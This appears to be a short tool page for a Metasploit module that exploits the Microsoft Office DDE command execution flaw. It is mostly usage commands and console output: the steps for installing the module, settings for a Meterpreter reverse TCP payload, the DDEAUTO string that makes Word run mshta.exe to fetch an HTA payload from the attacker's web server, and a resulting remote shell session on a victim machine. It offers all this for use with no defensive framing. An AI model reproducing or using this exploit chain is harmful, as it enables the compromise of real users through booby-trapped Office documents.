Metasploit module to exploit Microsoft Office DDE Command Execution Vulnerability

dde_delivery

This module generates an DDE command to place within a word document, that when executed, will retrieve a HTA payload via HTTP from an web server. Currently have not figured out how to generate a doc.

Usage

1. Download dde_delivery Metasploit module
   wget https://raw.githubusercontent.com/realoriginal/metasploit-framework/fb3410c4f2e47a003fd9910ce78f0fc72e513674/modules/exploits/windows/script/dde_delivery.rb
2. Move this module to /usr/share/metasploit-framework/modules/exploits/windows/ directory
3. Enjoy!

   msf > use exploit/windows/script/office_dde_delivery
   msf exploit(office_dde_delivery) > show options

   Module options (exploit/windows/script/office_dde_delivery):

   Name Current Setting Required Description
   —- ————— ——– ———–
   SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT 8080 yes The local port to listen on.
   SSL false no Negotiate SSL for incoming connections
   SSLCert no Path to a custom SSL certificate (default is randomly generated)
   URIPATH no The URI to use for this exploit (default is random)

    

   Exploit target:

   Id Name
   — —-
   0 Automatic

   msf exploit(office_dde_delivery) > set PAYLOAD windows/meterpreter/reverse_tcp
   PAYLOAD => windows/meterpreter/reverse_tcp
   msf exploit(office_dde_delivery) > set LHOST eth0
   LHOST => 192.168.0.11
   msf exploit(office_dde_delivery) > set LPORT 14313
   LPORT => 14313
   msf exploit(office_dde_delivery) > run
   [*] Exploit running as background job 0.

   [*] Started reverse TCP handler on 192.168.0.11:14313
   [*] Using URL: http://0.0.0.0:8080/D77nWOo
   [*] Local IP: http://192.168.0.11:8080/D77nWOo
   [*] Server started.
   [*] Place the following DDE in an MS document:
   DDEAUTO C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..\\windows\\system32\\mshta.exe “http://192.168.0.11:8080/D77nWOo”
   msf exploit(office_dde_delivery) > [*] 192.168.0.12 office_dde_delivery – Delivering payload
   [*] Sending stage (179267 bytes) to 192.168.0.12
   [*] Meterpreter session 1 opened (192.168.0.11:14313 -> 192.168.0.12:51116) at 2017-10-24 08:32:40 -0400
   sessions -i 1
   [*] Starting interaction with 1…

   meterpreter > sysinfo
   Computer : TEST-PC
   OS : Windows 7 (Build 7601, Service Pack 1).
   Architecture : x64
   System Language : en_US
   Domain : WORKGROUP
   Logged On Users : 1
   Meterpreter : x86/windows
   meterpreter >

Reference: realoriginal